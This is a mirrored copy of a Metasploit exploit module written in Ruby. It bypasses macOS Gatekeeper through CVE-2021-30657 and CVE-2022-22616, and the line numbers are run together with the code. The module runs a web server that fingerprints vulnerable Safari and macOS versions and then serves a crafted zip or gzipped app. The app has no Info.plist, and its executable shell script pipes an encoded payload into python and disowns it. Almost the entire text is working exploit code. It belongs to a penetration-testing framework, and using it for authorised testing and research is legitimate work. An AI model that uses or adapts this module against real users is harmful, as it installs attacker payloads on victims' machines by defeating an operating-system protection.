CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/osx/browser/osx_gatekeeper_bypass.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ManualRanking78include Msf::Exploit::EXE9include Msf::Exploit::Remote::HttpServer1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'macOS Gatekeeper check bypass',16'Description' => %q{17This module exploits two CVEs that bypass Gatekeeper.1819For CVE-2021-30657, this module serves an OSX app (as a zip) that contains no20Info.plist, which bypasses gatekeeper in macOS < 11.3.21If the user visits the site on Safari, the zip file is automatically extracted,22and clicking on the downloaded file will automatically launch the payload.23If the user visits the site in another browser, the user must click once to unzip24the app, and click again in order to execute the payload.2526For CVE-2022-22616, this module serves a gzip-compressed zip file with its file header pointing27to the `Contents` directory which contains an OSX app. If the user downloads the file via Safari,28Safari will automatically decompress the file, removing its `com.apple.quarantine` attribute.29Because of this, the file will not require quarantining, bypassing Gatekeeper on30MacOS versions below 12.3.31},32'License' => MSF_LICENSE,33'Targets' => [34[ 'macOS x64 (Native Payload)', { 'Arch' => ARCH_X64, 'Platform' => [ 'osx' ] } ],35[ 'Python payload', { 'Arch' => ARCH_PYTHON, 'Platform' => [ 'python' ] } ],36[ 'Command payload', { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] } ]37],38'DefaultTarget' => 0,39'DisclosureDate' => '2021-03-25',40'Author' => [41'Cedric Owens', # CVE-2021-30657 Discovery42'timwr', # Module43'Ferdous Saljooki', # CVE-2022-22616 Discovery (@malwarezoo)44'Jaron Bradley', # CVE-2022-22616 Discovery (@jbradley89)45'Mickey Jin', # CVE-2022-22616 Discovery (@patch1t)46'Shelby Pace' # CVE-2022-22616 Additions47],48'Notes' => {49'Stability' => [ CRASH_SAFE ],50'Reliability' => [ REPEATABLE_SESSION ],51'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ]52},53'References' => [54['CVE', '2021-30657'],55['CVE', '2022-22616'],56['URL', 'https://cedowens.medium.com/macos-gatekeeper-bypass-2021-edition-5256a2955508'],57['URL', 'https://objective-see.com/blog/blog_0x64.html'],58['URL', 'https://jhftss.github.io/CVE-2022-22616-Gatekeeper-Bypass/'],59['URL', 'https://www.jamf.com/blog/jamf-threat-labs-safari-vuln-gatekeeper-bypass/']60]61)62)63register_options([64OptString.new('APP_NAME', [false, 'The application name (Default: app)', 'app']),65OptEnum.new('CVE', [true, 'The vulnerability to exploit', 'CVE-2022-22616', ['CVE-2021-30657', 'CVE-2022-22616']])66])67end6869def cve70datastore['CVE']71end7273def check_useragent(user_agent)74safari_version = nil75if user_agent =~ %r{Version/(\d+\.\d+(\.\d+)*)\sSafari}76safari_version = Regexp.last_match(1)77end7879if safari_version && Rex::Version.new(safari_version) < Rex::Version.new('15.4') && cve == 'CVE-2022-22616'80print_good("Safari version #{safari_version} is vulnerable")81return true82end8384return false unless user_agent =~ /Intel Mac OS X (.*?)\)/8586osx_version = Regexp.last_match(1).gsub('_', '.')87mac_osx_version = Rex::Version.new(osx_version)88if mac_osx_version >= Rex::Version.new('12.3')89print_warning "macOS version #{mac_osx_version} is not vulnerable"90elsif mac_osx_version < Rex::Version.new('10.15.6')91print_warning "macOS version #{mac_osx_version} is not vulnerable"92else93print_good "macOS version #{mac_osx_version} is vulnerable"94return true95end9697false98end99100def on_request_uri(cli, request)101user_agent = request['User-Agent']102print_status("Request #{request.uri} from #{user_agent}")103unless check_useragent(user_agent)104print_error 'Unexpected User-Agent'105send_not_found(cli)106return107end108109app_name = datastore['APP_NAME'] || Rex::Text.rand_text_alpha(5)110111app_file_name = "#{app_name}.zip"112zipped = app_zip(app_name)113114if cve == 'CVE-2022-22616'115zipped = Rex::Text.gzip(zipped)116app_file_name = "#{app_file_name}.gz"117end118119send_response(cli, zipped, { 'Content-Type' => 'application/zip', 'Content-Disposition' => "attachment; filename=\"#{app_file_name}\"" })120end121122def app_zip(app_name)123case target['Arch']124when ARCH_X64125payload_data = Msf::Util::EXE.to_python_reflection(framework, ARCH_X64, payload.encoded, {})126command = "echo \"#{payload_data}\" | python & disown"127when ARCH_PYTHON128command = "echo \"#{payload.encoded}\" | python"129when ARCH_CMD130command = payload.encoded131end132133shell_script = <<~SCRIPT134#!/bin/sh135136#{command}137SCRIPT138139zip = Rex::Zip::Archive.new140zip.add_file("#{app_name}.app/", '') if cve != 'CVE-2022-22616'141zip.add_file("#{app_name}.app/Contents/", '')142zip.add_file("#{app_name}.app/Contents/MacOS/", '')143zip.add_file("#{app_name}.app/Contents/MacOS/#{app_name}", shell_script).last.attrs = 0o777144zip.pack145end146end147148149